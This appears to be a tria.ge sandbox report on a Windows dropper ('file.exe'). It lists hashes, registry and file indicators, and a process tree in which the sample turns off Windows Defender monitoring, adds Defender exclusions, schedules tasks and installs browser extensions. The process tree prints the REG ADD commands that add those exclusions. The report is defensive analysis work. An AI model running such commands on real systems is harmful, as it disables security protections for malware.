Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
01/12/2022, 08:57
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
1e288e30a66aea5fe48e6e9df80a4109
-
SHA1
95d0eb690b937c161e7047a935636e39bbc1e3f4
-
SHA256
628a2d90da23bcaa6a66af59988a4e862d2dbdc7452aebe5b0afa97caf767179
-
SHA512
d0698691889a012087776a317776a2faf9c77ed2604cfe4e7b166bfe7bb4da673aed897b4a9410322d703cb6712eb1a483fd44fe7a9b1e959dddf63c9935cc91
-
SSDEEP
196608:91Oxo41INZrkdXuE4qjkia4Gs0b4xLbp5+5y:3OxTmrkfgoRH
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kOgboOUMyeTU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ypnECPGzU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KNfLkiMphNUn = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NiCWuKvvKWJgC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NiCWuKvvKWJgC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\kenPgsqBLemLniqf = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\kenPgsqBLemLniqf = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ypnECPGzU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kOgboOUMyeTU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BBXtEIsMTiOzNlVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BBXtEIsMTiOzNlVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KNfLkiMphNUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\kenPgsqBLemLniqf = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\kenPgsqBLemLniqf = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 772 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1748 Install.exe 1376 Install.exe 1244 TZFbmXh.exe 608 xEAtpTH.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation xEAtpTH.exe -
Loads dropped DLL 12 IoCs
pid Process 1492 file.exe 1748 Install.exe 1748 Install.exe 1748 Install.exe 1748 Install.exe 1376 Install.exe 1376 Install.exe 1376 Install.exe 772 rundll32.exe 772 rundll32.exe 772 rundll32.exe 772 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json xEAtpTH.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat xEAtpTH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xEAtpTH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3 xEAtpTH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol TZFbmXh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xEAtpTH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 xEAtpTH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3 xEAtpTH.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini TZFbmXh.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xEAtpTH.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol xEAtpTH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 xEAtpTH.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol TZFbmXh.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA xEAtpTH.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR\yyCwwqE.dll xEAtpTH.exe File created C:\Program Files (x86)\KNfLkiMphNUn\mBpRffc.dll xEAtpTH.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xEAtpTH.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi xEAtpTH.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja xEAtpTH.exe File created C:\Program Files (x86)\kOgboOUMyeTU2\EyQojoa.xml xEAtpTH.exe File created C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR\DjNhQHe.xml xEAtpTH.exe File created C:\Program Files (x86)\NiCWuKvvKWJgC\aKoVDGx.dll xEAtpTH.exe File created C:\Program Files (x86)\NiCWuKvvKWJgC\pJHrhaU.xml xEAtpTH.exe File created C:\Program Files (x86)\ypnECPGzU\UPmcbH.dll xEAtpTH.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak xEAtpTH.exe File created C:\Program Files (x86)\ypnECPGzU\ipABmKs.xml xEAtpTH.exe File created C:\Program Files (x86)\kOgboOUMyeTU2\wUePImxcXbpHq.dll xEAtpTH.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bnXhqWnZYPWvluXGbm.job schtasks.exe File created C:\Windows\Tasks\aMjmbceFMDnLRQrhL.job schtasks.exe File created C:\Windows\Tasks\YdTBLvROIXvKiKj.job schtasks.exe File created C:\Windows\Tasks\BtdEAPXLHUGyDJnnI.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 368 schtasks.exe 1104 schtasks.exe 1112 schtasks.exe 1544 schtasks.exe 1240 schtasks.exe 952 schtasks.exe 2040 schtasks.exe 976 schtasks.exe 368 schtasks.exe 1956 schtasks.exe 320 schtasks.exe 1324 schtasks.exe 368 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates xEAtpTH.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadDecisionReason = "1" xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\9e-6f-1a-e7-0f-fc xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632} xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates xEAtpTH.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f000b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs xEAtpTH.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadDecisionTime = 50e5722d6305d901 xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadDecision = "0" xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" xEAtpTH.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs xEAtpTH.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs xEAtpTH.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDecisionTime = 50e5722d6305d901 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root xEAtpTH.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 872 powershell.EXE 872 powershell.EXE 872 powershell.EXE 296 powershell.EXE 296 powershell.EXE 296 powershell.EXE 368 powershell.EXE 368 powershell.EXE 368 powershell.EXE 1760 powershell.EXE 1760 powershell.EXE 1760 powershell.EXE 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe 608 xEAtpTH.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 872 powershell.EXE Token: SeDebugPrivilege 296 powershell.EXE Token: SeDebugPrivilege 368 powershell.EXE Token: SeDebugPrivilege 1760 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1492 wrote to memory of 1748 1492 file.exe 27 PID 1492 wrote to memory of 1748 1492 file.exe 27 PID 1492 wrote to memory of 1748 1492 file.exe 27 PID 1492 wrote to memory of 1748 1492 file.exe 27 PID 1492 wrote to memory of 1748 1492 file.exe 27 PID 1492 wrote to memory of 1748 1492 file.exe 27 PID 1492 wrote to memory of 1748 1492 file.exe 27 PID 1748 wrote to memory of 1376 1748 Install.exe 28 PID 1748 wrote to memory of 1376 1748 Install.exe 28 PID 1748 wrote to memory of 1376 1748 Install.exe 28 PID 1748 wrote to memory of 1376 1748 Install.exe 28 PID 1748 wrote to memory of 1376 1748 Install.exe 28 PID 1748 wrote to memory of 1376 1748 Install.exe 28 PID 1748 wrote to memory of 1376 1748 Install.exe 28 PID 1376 wrote to memory of 832 1376 Install.exe 30 PID 1376 wrote to memory of 832 1376 Install.exe 30 PID 1376 wrote to memory of 832 1376 Install.exe 30 PID 1376 wrote to memory of 832 1376 Install.exe 30 PID 1376 wrote to memory of 832 1376 Install.exe 30 PID 1376 wrote to memory of 832 1376 Install.exe 30 PID 1376 wrote to memory of 832 1376 Install.exe 30 PID 1376 wrote to memory of 840 1376 Install.exe 33 PID 1376 wrote to memory of 840 1376 Install.exe 33 PID 1376 wrote to memory of 840 1376 Install.exe 33 PID 1376 wrote to memory of 840 1376 Install.exe 33 PID 1376 wrote to memory of 840 1376 Install.exe 33 PID 1376 wrote to memory of 840 1376 Install.exe 33 PID 1376 wrote to memory of 840 1376 Install.exe 33 PID 832 wrote to memory of 1228 832 forfiles.exe 34 PID 832 wrote to memory of 1228 832 forfiles.exe 34 PID 832 wrote to memory of 1228 832 forfiles.exe 34 PID 832 wrote to memory of 1228 832 forfiles.exe 34 PID 832 wrote to memory of 1228 832 forfiles.exe 34 PID 832 wrote to memory of 1228 832 forfiles.exe 34 PID 832 wrote to memory of 1228 832 forfiles.exe 34 PID 840 wrote to memory of 552 840 forfiles.exe 35 PID 840 wrote to memory of 552 840 forfiles.exe 35 PID 840 wrote to memory of 552 840 forfiles.exe 35 PID 840 wrote to memory of 552 840 forfiles.exe 35 PID 840 wrote to memory of 552 840 forfiles.exe 35 PID 840 wrote to memory of 552 840 forfiles.exe 35 PID 840 wrote to memory of 552 840 forfiles.exe 35 PID 1228 wrote to memory of 1244 1228 cmd.exe 37 PID 1228 wrote to memory of 1244 1228 cmd.exe 37 PID 1228 wrote to memory of 1244 1228 cmd.exe 37 PID 1228 wrote to memory of 1244 1228 cmd.exe 37 PID 1228 wrote to memory of 1244 1228 cmd.exe 37 PID 1228 wrote to memory of 1244 1228 cmd.exe 37 PID 1228 wrote to memory of 1244 1228 cmd.exe 37 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 1228 wrote to memory of 1888 1228 cmd.exe 38 PID 1228 wrote to memory of 1888 1228 cmd.exe 38 PID 1228 wrote to memory of 1888 1228 cmd.exe 38 PID 552 wrote to memory of 1908 552 cmd.exe 39 PID 552 wrote to memory of 1908 552 cmd.exe 39 PID 552 wrote to memory of 1908 552 cmd.exe 39 PID 1228 wrote to memory of 1888 1228 cmd.exe 38 PID 1228 wrote to memory of 1888 1228 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Users\Admin\AppData\Local\Temp\7zS1150.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Users\Admin\AppData\Local\Temp\7zS16BC.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1228 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1244
-
-
